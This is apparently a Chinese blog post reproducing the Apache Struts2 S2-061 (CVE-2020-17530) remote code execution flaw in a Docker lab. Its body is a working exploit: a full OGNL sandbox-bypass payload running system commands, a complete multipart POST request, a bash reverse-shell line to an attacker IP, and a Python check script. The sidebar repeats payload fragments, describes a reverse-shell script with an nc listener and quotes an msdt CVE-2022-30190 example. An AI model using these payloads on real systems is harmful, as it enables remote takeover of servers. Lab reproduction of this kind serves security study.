Struts2 S2-061 远程命令执行漏洞(CVE-2020-17530)复现

最新推荐文章于 2022-12-14 15:42:15 发布
最新推荐文章于 2022-12-14 15:42:15 发布
阅读量4.7k 收藏 7
点赞数 4
分类专栏: 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44159028/article/details/114134008
版权

目录

漏洞简介

影响版本

漏洞复现

docker-compose文件搭建漏洞环境

漏洞测试

修复建议

漏洞检测poc

漏洞简介

Apache Struts2框架是一个用于开发Java EE网络应用程序的Web框架。Apache Struts于2020年12月08日披露 S2-061 Struts 远程代码执行漏洞(CVE-2020-17530),在使用某些tag等情况下可能存在OGNL表达式注入漏洞,从而造成远程代码执行,风险极大。
 

影响版本

  • Apache Struts 2.0.0 - 2.5.25

漏洞复现

docker-compose文件搭建漏洞环境

这里搭建Apache Struts 2.5.25的环境

docker-compose.yml文件内容如下

version: '2'
services:
 struts2:
   image: vulhub/struts2:2.5.25
   ports:
    - "8080:8080"

执行docker-compose up -d 启动环境

访问8080端口

 

漏洞测试

1. 验证漏洞是否存在

xx:8080/?id=%25%7b+%27test%27+%2b+(2021+%2b+20).toString()%7d

发现执行了 2021+20的命令

 

2. 执行系统命令id

:8080/?id=%25{(%27Powered_by_Unicode_Potats0%2cenjoy_it%27).(%23UnicodeSec+%3d+%23application[%27org.apache.tomcat.InstanceManager%27]).(%23potats0%3d%23UnicodeSec.newInstance(%27org.apache.commons.collections.BeanMap%27)).(%23stackvalue%3d%23attr[%27struts.valueStack%27]).(%23potats0.setBean(%23stackvalue)).(%23context%3d%23potats0.get(%27context%27)).(%23potats0.setBean(%23context)).(%23sm%3d%23potats0.get(%27memberAccess%27)).(%23emptySet%3d%23UnicodeSec.newInstance(%27java.util.HashSet%27)).(%23potats0.setBean(%23sm)).(%23potats0.put(%27excludedClasses%27%2c%23emptySet)).(%23potats0.put(%27excludedPackageNames%27%2c%23emptySet)).(%23exec%3d%23UnicodeSec.newInstance(%27freemarker.template.utility.Execute%27)).(%23cmd%3d{%27id%27}).(%23res%3d%23exec.exec(%23cmd))}

3. 反弹shell

反弹shell的命令,需将命令先做一个编码的转换 ,网址:http://www.jackson-t.ca/runtime-exec-payloads.html

bash -i >& /dev/tcp/xx.xx.xx.xx/6666 0>&1      

将命令填入下面的xxxxxxx中,进行发送

POST /index.action HTTP/1.1
Host: 192.168.1.5:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryl7d1B1aGsV2wcZwF
Content-Length: 922

------WebKitFormBoundaryl7d1B1aGsV2wcZwF
Content-Disposition: form-data; name="id"

%{(#instancemanager=#application["org.apache.tomcat.InstanceManager"]).(#stack=#attr["com.opensymphony.xwork2.util.ValueStack.ValueStack"]).(#bean=#instancemanager.newInstance("org.apache.commons.collections.BeanMap")).(#bean.setBean(#stack)).(#context=#bean.get("context")).(#bean.setBean(#context)).(#macc=#bean.get("memberAccess")).(#bean.setBean(#macc)).(#emptyset=#instancemanager.newInstance("java.util.HashSet")).(#bean.put("excludedClasses",#emptyset)).(#bean.put("excludedPackageNames",#emptyset)).(#arglist=#instancemanager.newInstance("java.util.ArrayList")).(#arglist.add("xxxxxxxxxxxxxxxxxxxxx")).(#execute=#instancemanager.newInstance("freemarker.template.utility.Execute")).(#execute.exec(#arglist))}
------WebKitFormBoundaryl7d1B1aGsV2wcZwF--

修复建议

升级至最新版

漏洞检测poc

import requests
import argparse
import os
def url():
		parser = argparse.ArgumentParser(description='Struts2 S2-061 远程命令执行漏洞(CVE-2020-17530)POC')
		parser.add_argument('target_url',type=str,help='The target address,example: http://192.168.140.153:8848')
		args = parser.parse_args() 
		global url
		url = args.target_url
		#检测输入的url的正确性
		if url.startswith('http://') or url.startswith('https://'):
			pass
		else:
			print('[-]Please include http:// or https:// in the URL!!')
			os._exit(0)
		if url.endswith('/'):
			url = url[:-1]
		print('[+]author:chenchen')
		print("[-]Struts2 S2-061 远程命令执行漏洞(CVE-2020-17530)POC",)
		print("[-]开始执行检测...")
		print("[-]目标地址:",url)
		return url
def poc():
	headers={
		'User-Agent':'Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.75 Mobile Safari/537.36'
	}
	vul_url = url + '/?id=%25%7b+%27test%27+%2b+(2021+%2b+20).toString()%7d'
	try:
		text = requests.get(vul_url,headers=headers,timeout=10).text
		if '2041' in text:
			print('[+]漏洞存在')
		else:
			print('[-]漏洞不存在')
	except:
		print('[-]发生错误')
if __name__ == '__main__':
	url()
	poc()

——心若没有栖息的地方,到哪都是流浪

小谢同学~
关注
  • 4
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
专栏目录
CVE-2020-17530:S2-061 的payload,以及对应简单的PoCExp
04-25
S2-061 脚本皆根据vulhub的struts2-059/061漏洞测试环境来写的,不具普遍性,还望大佬多多指教 struts2-061-poc.py(可执行简单系统命令) 用法:python struts2-061-poc.py command 例子:python struts2-061-poc.py whoami S2-061-shell.py(可反弹shell) 用法: 首先在一台机器A上监听指定端口(例如:nc -lvvp 7777) 执行脚本:python2 S2-061-shell.py target_url,其中target_url为漏洞环境地址,形式为 根据脚本提示输入A机器的IP及所监听的端口,即可在机器A的监听窗口获取到shell 以下是几个大佬搞出来的payload: payload-1:(from ka1n4t) %{(#instancemanager=#a
墨者学院13 Apache Struts2远程代码执行漏洞(S2-016)复现
weixin_42789937的博客
02-24 812
墨者学院13 Apache Struts2远程代码执行漏洞(S2-016)复现,参考大佬的wp,是第二版,补充了一些下载御剑、maltego的错误解题过程(●'◡'●)~
Struts2漏洞复现
weixin_51151498的博客
12-14 1172
Struts2漏洞复现
Apache Struts2远程代码执行漏洞(S2-016)
weixin_47493074的博客
09-24 912
Apache Struts2远程代码执行漏洞(S2-016)
0x1E. Apache Struts2远程代码执行漏洞(S2-016)复现
qq_31679787的博客
10-15 548
s2-016:在2.3.15.1之前的Struts 2中,“ action:”,“ redirect:”或“ redirectAction:”之后的信息未正确清除。由于所述信息将根据值堆栈作为OGNL表达式进行评估,因此这引入了注入服务器端代码的可能性; 使用工具检测s2-016漏洞,发现存在漏洞命令执行,发现key.txt; 查看文件,得到key; poc: http:...
Struts2 S2-061(CVE-2020-17530)漏洞复现
qq_56258713的博客
07-03 1355
Struts2 S2-061(CVE-2020-17530)漏洞复现
CVE-2020-13925 Apache Kylin 远程命令执行漏洞.md
04-12
CVE-2020-13925 Apache Kylin 远程命令执行漏洞
jackson-CVE-2020-8840:FasterXMLjackson-databind远程代码执行漏洞
03-08
CVE-2020-8840 FasterXML / jackson-databind远程代码执行漏洞
CVE-2020-17530
03-21
CVE-2020-17530 s2-061 POC: %{(#instancemanager=#application["org.apache.tomcat.InstanceManager"]).(#stack=#attr["com.opensymphony.xwork2.util.ValueStack.ValueStack"]).(#bean=#instancemanager.newInstance("org.apache.commons.collections.BeanMap")).(#bean.setBean(#stack)).(#context=#bean.get("context")).(#bean.setBean(#context)).(#macc=#bean.get("memberAccess")).(#bean.setBean(#macc)).(#emptyset=#
CVE-2020-17530 Struts2远程代码执行漏洞复现
m0_58596609的博客
01-12 1174
CVE-2020-17530 Struts2远程代码执行漏洞复现
CVE-2020-17530: Apache Struts2 远程代码执行漏洞通告
爱国小白帽
12-08 8547
报告编号:B6-2020-120801 报告来源:360CERT 报告作者:360CERT 更新日期:2020-12-08 0x01 漏洞简述 2020年12月08日,360CERT监测发现 struts2 发布了 struts2 代码执行漏洞 的风险通告,该漏洞编号为 CVE-2020-17530漏洞等级:高危 ,漏洞评分:7.5 。 在特定的环境下,远程攻击者通过构造 恶意的OGNL表达式 ,可造成 任意代码执行 。 对此,360CERT建议广大用户及时将 struts2 升级到最新版.
CVE-2020-17530 Struts2-061远程代码执行漏洞
Makboli的博客
08-29 1241
CVE-2020-17530 Struts2-061远程代码执行漏洞
struts2 代码执行 (CVE-2020-17530)
yxr520yj的博客
09-27 1082
struts在某些情况下可能存在OGNL表达式注入注入漏洞,如果开发人员使用了%{…}语法,进行强制的OGNL解析,某些特殊的TAG属性可能被双重解析,攻击者可以通过构造恶意的OGNL表达式来利用此漏洞,最终造成远程代码执行。OGNL表达式注入注入漏洞,如果开发人员使用了%{…}语法,进行强制的OGNL解析,某些特殊的TAG属性可能被双重解析,攻击者可以通过构造恶意的OGNL表达式来利用此漏洞,最终造成远程代码执行漏洞。#struts2代码执行漏洞
修复漏洞--Struts2远程命令执行S2-016/S2-017
qq_38281963的博客
11-28 2362
问题描述:该问题是由于Struts2框架,主要是2.2之前版本漏洞所造成的,漏洞会引起数据泄露和容易被黑客攻击。 解决思路1:可以对现有工程进行maven版本更新,升级到2.3,但是版本升级一般费时费力 解决思路2:下载当前工程使用的Struts2版本源码,修改DefaultActionMapper中handleSpecialParameters方法 因为本项目版本依赖复杂,版本升级难度较大...
(墨者学院)Apache Struts2远程代码执行漏洞 S2-004
qq_41453632的博客
01-04 1710
实验环境:以墨者学院靶机为例 s2-004漏洞为:目录遍历漏洞。 定义:在只是文件交互的一种简单的过程,但是由于文件名可以任意更改而服务器支持“~/”,“../”等特殊符号的目录回溯,从而使攻击者越权访问或者覆盖敏感数据,如网站的配置文件、系统的核心文件,这样的缺陷被命名为路径遍历漏洞。在检查一些常规的Web应用程序时,也常常有发现,只是相对隐蔽而已。 利用方法为:/struts/..%25...
cve-2022-30190 msdt远程代码执行漏洞复现
最新发布
09-10
CVE-2022-30190是一个针对Microsoft的漏洞,被称为msdt远程代码执行漏洞。该漏洞允许攻击者通过利用命令行工具"msdt.exe"的特定参数进行远程代码执行。以下是关于该漏洞复现过程。 首先,我们需要使用攻击者控制的远程服务器,以便在受影响的目标系统上执行恶意代码。我们创建以下PHP脚本,将其上传到我们的远程服务器上: ``` <?php system('calc.exe'); ?> ``` 这段代码将在目标系统上执行计算器应用程序,然后我们将通过"msdt.exe"命令行工具的特定参数利用该漏洞。 在受影响的目标系统上,我们将打开命令提示符,并执行以下命令: ``` msdt.exe "http://your-remote-server.com/evil-script.php" /id "netwoCpl" /showUI ``` 上述命令将启动"msdt.exe"并使用指定的URL作为参数,同时还指定了"networkCpl"作为"msdt.exe"的标识符。最后,使用"/showUI"参数显示用户界面。 当目标系统执行命令时,"msdt.exe"会检索远程服务器上的脚本文件,并尝试执行该脚本。由于脚本文件具有恶意代码,它将在目标系统上执行计算器应用程序。 这就是CVE-2022-30190 msdt远程代码执行漏洞的一个简单复现过程。然而,值得注意的是,这只是为了说明该漏洞的原理,实际的攻击可能需要更复杂的技术和步骤。为了保护系统安全,我们建议及时更新受影响的软件,以修补此漏洞。还应该维护良好的网络安全措施,以减少被利用的风险。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

小谢同学~

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值